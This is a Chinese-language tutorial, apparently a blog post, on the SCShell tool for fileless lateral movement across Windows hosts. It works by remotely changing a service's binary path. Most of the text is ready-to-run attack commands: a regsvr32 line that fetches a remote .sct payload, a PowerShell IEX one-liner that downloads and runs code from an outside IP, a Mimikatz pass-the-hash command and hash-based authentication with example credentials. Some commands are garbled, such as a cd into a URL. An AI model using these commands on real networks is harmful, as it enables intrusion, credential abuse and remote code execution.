橫向無文件移動–SCshell使用
1、簡介
SCShell是無文件橫向移動工具,它依賴ChangeServiceConfigA來運行命令。該工具的優點在於它不會針對SMB執行身份驗證。一切都通過DCERPC執行。無需創建服務,而只需通過ChangeServiceConfigAAPI 遠程打開服務並修改二進制路徑名即可(所以要事先知道目標上的服務名稱)。支持py和exe兩種文件類型。
2、使用
Windows 使用
SCShell.exe target service payload domain username password
SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password # XblAuthManager 是 Xbox Accessory Management Service的服務名
測試寫入文件
scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c:\windows\temp\hello.txt" . administrator admin@123
CSshell橫向利用powershell上線
scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('//182.1.1.156:8000/a')" . administrator admin@123
可以使用該C程序傳遞哈希值。
有時情況下,將使用當前進程令牌。您可以使用標準傳遞哈希方法設置當前流程令牌。
在本地系統上
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe
然後在新創建的cmd.exe中運行SCShell.exe進行橫向。
上面我們使用的是XblAuthManager,其實我們還可以使用defragsvc,msbuild等等
2. Linux 安裝使用
pip install impacket
git clone //github.com/Mr-Un1k0d3r/SCShell
cd //github.com/Mr-Un1k0d3r/SCShell
python scshell.py ./administrator:[email protected] # 執行cmd模式,沒有命令回顯
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash驗證
3、日誌痕迹
使用用戶憑證連接會在目標日誌系統留下用戶名、來訪機器IP和服務超時等信息
